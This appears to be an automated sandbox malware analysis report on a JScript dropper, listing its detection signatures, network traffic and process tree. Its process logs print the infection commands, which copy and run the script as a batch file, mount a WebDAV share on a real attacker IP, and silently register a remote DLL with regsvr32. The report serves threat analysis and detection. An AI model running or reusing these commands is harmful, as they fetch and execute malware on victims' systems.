Windows Analysis Report
911966882735824909.js

Overview

General Information

Sample name: 911966882735824909.js
Analysis ID: 1467954
MD5: 8c191d66f4255e637dad88e4af68b8a4
SHA1: 511998d50a6780c570dd0c920ba1dfeae2d27a43
SHA256: 7d84dcf2dd227761c0eb67814538c2d2eb6de133e7ad1977e6756f76742c9084
Tags: js
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 911966882735824909.js Virustotal: Detection: 23% Perma Link

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 45.9.74.13:8888
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FIRST-SERVER-EU-ASRU FIRST-SERVER-EU-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:06 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:09 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:10 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:10 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:11 GMTContent-Length: 0
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.9.74.13:8888/
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.9.74.13:8888/~

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: 911966882735824909.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal72.troj.spyw.evad.winJS@8/2@0/1
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\qtgsne.bat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 911966882735824909.js Virustotal: Detection: 23%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\911966882735824909.js" "%userprofile%\", "0", "false")
Registers a DLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\net.exe TID: 7380 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: net.exe, 00000003.00000002.1701789155.000002A73BD59000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1701789155.000002A73BDB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Gathers information about network shares
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\ Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467954 Sample: 911966882735824909.js Startdate: 05/07/2024 Architecture: WINDOWS Score: 72 22 Multi AV Scanner detection for submitted file 2->22 24 Uses known network protocols on non-standard ports 2->24 26 Sigma detected: WScript or CScript Dropper 2->26 7 wscript.exe 1 1 2->7         started        process3 signatures4 28 JScript performs obfuscated calls to suspicious functions 7->28 30 Windows Scripting host queries suspicious COM object (likely to drop second stage) 7->30 10 cmd.exe 3 7->10         started        process5 signatures6 32 Gathers information about network shares 10->32 13 net.exe 7 10->13         started        16 conhost.exe 10->16         started        18 regsvr32.exe 10->18         started        process7 dnsIp8 20 45.9.74.13, 49730, 49731, 8888 FIRST-SERVER-EU-ASRU Russian Federation 13->20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.9.74.13
 unknown Russian Federation
200740 FIRST-SERVER-EU-ASRU true